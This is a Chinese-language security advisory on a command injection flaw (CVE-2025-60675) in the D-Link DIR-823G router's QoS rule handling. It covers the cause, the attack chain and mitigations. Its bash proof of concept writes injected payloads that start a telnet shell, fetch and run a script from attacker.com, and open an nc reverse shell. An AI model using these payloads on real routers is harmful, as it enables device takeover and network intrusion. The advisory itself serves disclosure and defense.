D-Link DIR-823G路由器命令注入漏洞 (CVE-2025-60675)

漏洞信息

漏洞编号

CVE-2025-60675

漏洞类型

命令注入

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-823G

漏洞概述

D-Link DIR-823G是一款广泛使用的无线路由器设备。该漏洞存在于路由器固件DIR823G_V1.0.2B05_20181207.bin中的timelycheck和sysconf二进制文件中。这两个程序负责处理/tmp/new_qos.rule配置文件，该文件用于QoS（服务质量）规则配置。漏洞的根本原因在于程序在解析配置文件后，将提取的字段直接拼接到系统命令字符串中，并通过C标准库函数system()执行。由于整个过程中完全缺少输入验证和清理机制，攻击者可以通过构造恶意配置文件来注入任意系统命令。成功利用此漏洞需要攻击者具有对/tmp/new_qos.rule文件的写入权限，这可能通过其他途径（如文件上传漏洞、弱口令等）获得。漏洞的CVSS评分为5.4，属于中等严重程度，但考虑到路由器通常部署在家庭和办公网络中，攻击者一旦获得访问权限，可能导致整个网络被完全控制，造成数据泄露或进一步横向渗透。

技术细节

该命令注入漏洞的技术细节涉及多个组件的交互过程。首先，timelycheck和sysconf这两个二进制程序在启动时会读取/tmp/new_qos.rule配置文件的内容。该配置文件原本设计用于存储QoS规则参数，格式可能包含设备MAC地址、带宽限制等字段。程序使用标准字符串解析函数（如strtok、sscanf等）提取配置中的各个字段值。关键的安全缺陷在于，这些提取出的字段值被直接用于构建即将通过system()函数执行的命令字符串。例如，代码可能包含类似如下的逻辑：将配置字段与静态字符串拼接后执行system(cmd)，而没有对特殊字符进行过滤或转义。攻击者可以利用分号、管道符、反引号等shell元字符注入额外命令。更严重的是，由于system()函数使用/bin/sh执行命令，攻击者还可以利用$(command)或反引号`command`语法执行命令替换。由于路由器通常以root权限运行，攻击者注入的命令将以最高权限执行，从而完全控制设备。

攻击链分析

STEP 1

步骤1

攻击者获得路由器写入权限，能够创建或修改/tmp/new_qos.rule文件

STEP 2

步骤2

攻击者构造包含恶意命令注入payload的QoS配置文件，使用分号、管道符或命令替换语法

STEP 3

步骤3

timelycheck或sysconf进程被触发（可能通过定时任务或系统重启），读取/tmp/new_qos.rule文件

STEP 4

步骤4

程序解析配置文件，将包含恶意代码的字段值拼接到system()调用的命令字符串中

STEP 5

步骤5

system()函数通过/bin/sh执行构造的命令字符串，攻击者的注入代码以root权限运行

STEP 6

步骤6

攻击者成功执行任意命令，可以部署后门、窃取数据或进一步渗透内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2025-60675 PoC - D-Link DIR-823G Command Injection
# Target: D-Link DIR-823G Router
# Firmware: DIR823G_V1.0.2B05_20181207.bin
# Vulnerability: Command injection in /tmp/new_qos.rule processing

# This PoC demonstrates how to inject commands via malicious QoS rule file
# The injected commands will be executed by the vulnerable timelycheck/sysconf binaries

TARGET_IP="192.168.0.1"
MALICIOUS_QOS_FILE="/tmp/new_qos.rule"

# Create malicious QoS configuration file with command injection payload
# The semicolon (;) allows command chaining in shell
cat > "$MALICIOUS_QOS_FILE" << 'EOF'
device_mac=00:11:22:33:44:55;telnetd -p 8888 -l /bin/sh
bandwidth_up=1000
bandwidth_down=2000
priority=high
EOF

# Alternative injection using command substitution
cat > "$MALICIOUS_QOS_FILE" << 'EOF'
device_mac=00:11:22:33:44:55;$(wget http://attacker.com/shell.sh -O -|sh)
bandwidth_up=1000
bandwidth_down=2000
EOF

# Alternative: Reverse shell payload
cat > "$MALICIOUS_QOS_FILE" << 'EOF'
device_mac=00:11:22:33:44:55;nc -e /bin/sh attacker.com 4444
bandwidth_up=1000
bandwidth_down=2000
EOF

echo "[*] Malicious QoS rule file created: $MALICIOUS_QOS_FILE"
echo "[*] The file contains command injection payload"
echo "[*] When timelycheck or sysconf processes this file, injected commands will execute"

影响范围

D-Link DIR-823G固件版本 <= DIR823G_V1.0.2B05_20181207.bin

防御指南

临时缓解措施

由于该漏洞位于路由器固件层面，临时缓解措施有限。建议通过防火墙限制对路由器LAN接口的直接访问，仅允许受信任的设备连接。同时，监控网络流量和路由器日志以检测异常活动。虽然没有官方补丁，但可以联系D-Link技术支持获取安全更新或考虑使用支持安全更新的替代路由器设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60675
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60675
3 Details https://www.cvedetails.com/cve/CVE-2025-60675/
4 VulDB https://vuldb.com/cve/CVE-2025-60675
5 Link http://d-link.com
6 Link https://github.com/yifan20020708/SGTaint-0-day/blob/main/DLink/DLink-DIR-823G/CVE-2025-60675.md
7 Link https://www.dlink.com/en
8 Link https://www.dlink.com/en/security-bulletin/